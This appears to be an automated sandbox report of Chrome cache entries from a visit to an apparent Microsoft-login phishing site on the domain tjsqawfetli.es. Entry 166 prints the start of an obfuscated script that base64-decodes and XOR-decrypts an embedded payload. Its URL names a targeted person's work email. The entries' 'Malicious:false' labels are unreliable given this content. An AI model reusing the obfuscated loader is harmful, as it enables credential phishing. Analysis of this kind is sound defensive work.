                                                                                                                    Chrome Cache Entry: 160

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (870)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):875
                                                                                                                    Entropy (8bit):5.166075654318312
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:9291D29E03CDC3381E3084C02758C664
                                                                                                                    SHA1:28628EC6B9104BEABC80195C182782476A63ECAA
                                                                                                                    SHA-256:22581DC851BE745B629552A604CFCE7CFFD8EDDFC033D81FFFB07A8C708CE465
                                                                                                                    SHA-512:93EEFCDAF0EEB6EDE302C88E20446BA76D46C611E249AF36EFC1CDFA3F43C6A03CA0698D6B8FEA879FD31B069F146EB4A0465894D83DE4F44322D0D84683A606
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                                                    Preview:)]}'.["",["ios 18.4 release candidate","stefon diggs patriots signing","gpt 4o image generation","maine monday snowfall","humanitarian parole program","nyt crossword clues","wvu basketball coaching search","mortgage rates today refinance"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"6666996302431199825","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                    Chrome Cache Entry: 161

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):26765
                                                                                                                    Entropy (8bit):5.114987586674101
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:1A862A89D5633FAC83D763886726740D
                                                                                                                    SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                                                                    SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                                                                    SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/346fndDfLt88Ww23abbZTGRt6720
                                                                                                                    Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go

                                                                                                                    Chrome Cache Entry: 164

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):28000
                                                                                                                    Entropy (8bit):7.99335735457429
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                                                    SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                                                    SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                                                    SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/GDSherpa-bold.woff2
                                                                                                                    Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.

                                                                                                                    Chrome Cache Entry: 165

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):176
                                                                                                                    Entropy (8bit):4.813571907408894
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:7F643E32E35A61730C0FC5BAAE589337
                                                                                                                    SHA1:122A34877ADA80DD16AE2895F6934DB34AC0CD99
                                                                                                                    SHA-256:3C1A6480E85EB01615EAC2F481271CFE7E028E7B0A766A0D948FA85A485694B2
                                                                                                                    SHA-512:3B2870F5BFF38649F3A1395EBE7A14AEF1DECB5BF9EA4B61C9939E5771DAE2D303B3E9B1AA508974CF4C12BDCDEAE0D0CE23FC205157BBF8B092BDF3A7ECAD33
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCcWHizhFPZhyEgUNX1f-DRIFDRObJGMhjDjiIExzMhwSZglvEQQ9EKlSjhIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDTr_fRsSBQ2JslXlEgUNkWGVThIFDXUsYOsSBQ3QAkDsEgUNqF3jdCGKwqI58TAP8A==?alt=proto
                                                                                                                    Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKbAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDTr/fRsaAAoHDYmyVeUaAAoHDZFhlU4aAAoHDXUsYOsaAAoHDdACQOwaAAoHDahd43QaAA==

                                                                                                                    Chrome Cache Entry: 166

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (23657), with CRLF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):28700
                                                                                                                    Entropy (8bit):5.882417793805082
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:CC458F4E2E63FFAAAE4435BE22BF1E60
                                                                                                                    SHA1:5AC0EC6E29349F2912CAA41AC036C6ABE53F2B71
                                                                                                                    SHA-256:BA295E45ED9FDB823A46D93D3DA91748A02755C5624BAB0FACDE6F19D6A185CE
                                                                                                                    SHA-512:643679EC72887F7B450200B4F617438079AB5F6D3576240C355491E85CE70006CA2BC903D67308462040FE3770B675ED4AF08CAD0EE266122D90B414DD9819EC
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.com
                                                                                                                    Preview:<script>..function VOutrUxaBr(LCWxkIvDnu, pCMaDsqFnk) {..let AffLTJgYbL = '';..LCWxkIvDnu = atob(LCWxkIvDnu);..let wsmcZFnUvJ = pCMaDsqFnk.length;..for (let i = 0; i < LCWxkIvDnu.length; i++) {.. AffLTJgYbL += String.fromCharCode(LCWxkIvDnu.charCodeAt(i) ^ pCMaDsqFnk.charCodeAt(i % wsmcZFnUvJ));..}..return AffLTJgYbL;..}..var bUoGvGxhYE = VOutrUxaBr(`aDESACJCQEEHJTd/Uxo/RkQSTnh7IR4WLhxeEAEyJjtfESRfGwsFIjEwCF94HAJPRHk5Kx9cIUEWX0h4JyEDGztGCmx+aychAxs7RhQSBjRpYBkGP0JHW1t4NyYfGDgcVw0bIjAkHRM5VxoCGzp7IxsTMx1YCBYkeyEDCztGW0weJHt2X0NlAxsCBi4kNh5fIUEaDB05eigCUHUOGxIXJT0yBUxGODlrSCQ3MBgCPww5axoyI2I3ByVRQAgbOXwjBR0pGhMAIw4zCTZHI1ZZDRoODBAHESIHBzsjHT8hHB55aGwoEzEcNRYWeV5BOzNuZw4cPCNQcxklNhMEBBYMC0AoPC9sCzkWO1BZMwIzLXcXEQxaXAMaBSIgIjBzVHcjAQ4MGAEoeXQEA0ceISYpPCdRXycaDQN3QT4mXkE4Ri9lGDYkMXl3KzczDAgGOyJZRCg8JBoBGDMse3cgEx4XAxYWeV5BOzNuZw4cCj1rBidENgN7BDsPAlMoGRE9IEIke31ZKwcOA3cDOyFBeiIaZxoBHCA9awc3AA0Dd0E+JnRfOzEBZhgmR3tmcw0OMxMUBCgTe1soGSM4JyYgPVYGVR0bFwAcFhwHXgUzOyIgGDMkaGw7GDU6EwE7A0F6Ih0WMwsy

                                                                                                                    Chrome Cache Entry: 168

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):19
                                                                                                                    Entropy (8bit):3.6818808028034042
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:9FAE2B6737B98261777262B14B586F28
                                                                                                                    SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                                                                                                    SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                                                                                                    SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.google.com/async/ddljson?async=ntp:2
                                                                                                                    Preview:)]}'.{"ddljson":{}}

                                                                                                                    Chrome Cache Entry: 169

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):48316
                                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

                                                                                                                    Chrome Cache Entry: 170

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):268
                                                                                                                    Entropy (8bit):5.111190711619041
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                    SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                    SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                    SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>

                                                                                                                    Chrome Cache Entry: 89

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406603
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):116250
                                                                                                                    Entropy (8bit):7.997503309759718
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:8029470B58CA2B195F65FBA692E88876
                                                                                                                    SHA1:04048CC11C933E1FA1746691435CA2570014FAA7
                                                                                                                    SHA-256:1EA9F7D9EF69B57B7F685BD278594BA657F51E0265DF6A8F56B7074D0980AF69
                                                                                                                    SHA-512:81579750312BCA184A61A194860746154C69946D33D9E77C35CB49544AFCACA6B9805DC1EE2F5EB1A85B4A6D5C2BC0AA1B234C09F53EFA4EAF2B2067CBDCDEB5
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergederror_customizationloader_3d1cca97520c15b17c7a.js
                                                                                                                    Preview:...........k{.H.(.}........FXf....L......8L.....$F._.....*.$......N?..K......U..............._N...........7........F...........0... .fa.%<.M.o.{..(...d.k.(...I\..q..].IxW3..hX;..vrf..~...7~._....\..Z.&...`H.M.&.y-..<........Da...Z....F.....`5/.'.Q.%c.V..K.ZcjF..Sq...?..G4P....C..,.A.7a0yhi..*....PK..C.........4.v.y^.ta...Va.1.n...I-..Q.&+.........M..8.9X8.&.|....q.....Og......8.g3>.........6...a.i}.kf.m.n.w6.%^..d.;..7~2N.[.p.9....C...`p..^.~.......rjg.5...6.z~..:.g..0.gj.Oa.U....:........c..;?..n...3o..0C3...|~.Z.4..WWv..E..`n..`..X..j......0."...j...m...coY._...c..~.......J...[.I.;.M..:....;.n....`..1..=..wq...MZ...^........?.x.FAm..6.^.......'..|...#..X..q....O.~W.M3.+b..-u../...h.$..*..|.0..z..p.Y.......a.<.k.....S......@.8...8F.D.>.04.[.6..I..2.#?.z&o.6.........L-..`(.6-...b.}....P..g..!.e<:..Q.:..e./..V;n........6.m..........G..%e.gn...q...7...r.oB..<..u{..l....U=_E.'.a......o&....`#^...\..FK.d.......7...g......

                                                                                                                    Chrome Cache Entry: 90

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2989
                                                                                                                    Entropy (8bit):7.910905878883642
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:61A3BEA45346145D2F3D5C0454C6998B
                                                                                                                    SHA1:6F51F41C64B7B5114911D6889DD374913A52C936
                                                                                                                    SHA-256:3A595B56F90EBEC8BDCE6D8EBD88BDA21F9BFCE0BF0B8419E2DA044CF7829B29
                                                                                                                    SHA-512:24C9F63ACDE9DD4C864EF6D3E14C72B9EF9A58423437CD7D1F1202DDF25CDB044E4880530A0A6CAE49A439EDCEA8FB762B57A9AA131AE90EC319881959007602
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:.PNG........IHDR...P...P............pHYs...%...%.IR$...._IDATx..[.\G..._.K...3..I.MB......Y%..@&h........^..!Ax@....x]....Z`....Z.J".m...CH0Ql..[..9U.........3=...R....._U}.}_..U......W:.....u..8..&H...t-..aj.B.y..9P..:..8..}.....3.. e5............Ccy"....].....Cm.*.8p..:......~..].........r.8P..O..{. ..... .~........n.(.]..M._......._....@..|I...+..^...p....u......kU.b@......[.[^.>e,.T.y.Hv....q|.....)p.!..j..........(.e...|...O,..KF..s<f.p..(r..s(.;.g.0X8a.'....Y[S...tn.d...1..&xn..z..f..g-...I}.Pc:.[2S..(o+]..#D.......<.q.o.1 .A.S............F..s...A2 .>..X.z)..rH.......X....H..S....$>....|M...n.!.6._..d.O...D.O.....U.I...]....F....7...]..-P...."...3.r.".{.*......{$...h"..k6.K..b...b............{U.._..3....6G.94.0w.`....E.k.pa..7....*'r........;.&.=.t.~..:...YHvm.-.v....v.,....8...D.e.......w.=.#..6.0]F...w.....o........(..2V...$.`......NE.S..<..G7 ....l.;5....!...V.....+.I..5......"qa.\..w..> .&.|W..(.@...x.|k....|}.Fm..DX

                                                                                                                    Chrome Cache Entry: 91

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):61052
                                                                                                                    Entropy (8bit):7.996159932827634
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                    SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                    SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                    SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                                    Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.

                                                                                                                    Chrome Cache Entry: 92

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1298
                                                                                                                    Entropy (8bit):6.665390877423149
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:32CA2081553E969F9FDD4374134521AD
                                                                                                                    SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                                                                    SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                                                                    SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt

                                                                                                                    Chrome Cache Entry: 93

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (47048), with CRLF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1241177
                                                                                                                    Entropy (8bit):5.882354087546844
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:DD0F6BFA27709FBE01985B7F986128B2
                                                                                                                    SHA1:1AC637E35E937AF49E422C7C4639889D63DFF9DB
                                                                                                                    SHA-256:C7BD7CCF9C281896F0D0CE7CA8355EA43036EF3D9B0DB937E53363C9FAA32958
                                                                                                                    SHA-512:8A7818FD602B922FB07EDEEBFF4C480D99BE9D6EA6DB5EF5E6741F97E9B0E9E8E3F979B51B4F7BEF9413A50A84CBB37B9006F59460E0B1EA1377CC41FE2E1ACA
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSL
                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="doclogostyle">..body#doclogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}..#doclogoele {.. width: 100%;.. height: 100%;.. position: absolute;.. text-align: center;.. display: flex;.. justify-content: center;.. align-items: flex-end;.. flex-wrap: wrap;.. z-index: 1051;..}....:root {.. --anim-container-width: 220px;.. --anim-container-height: 250px;.. --anim-container-border: none;.. --w-size: 88px;.. --w-left: 20px;.. --line-width: 132px;.. --line-height: 38.5px;.. --line-origin-x: 68px;.. --line-origin-y: calc((var(--anim-container-height) / 2) - (var(--line-height) * 2));..

                                                                                                                    Chrome Cache Entry: 94

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1435
                                                                                                                    Entropy (8bit):7.8613342322590265
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                    SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                    SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                    SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                    Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                                                                                                    Chrome Cache Entry: 95

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):36696
                                                                                                                    Entropy (8bit):7.988666025644622
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                    SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                    SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                    SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/GDSherpa-regular.woff
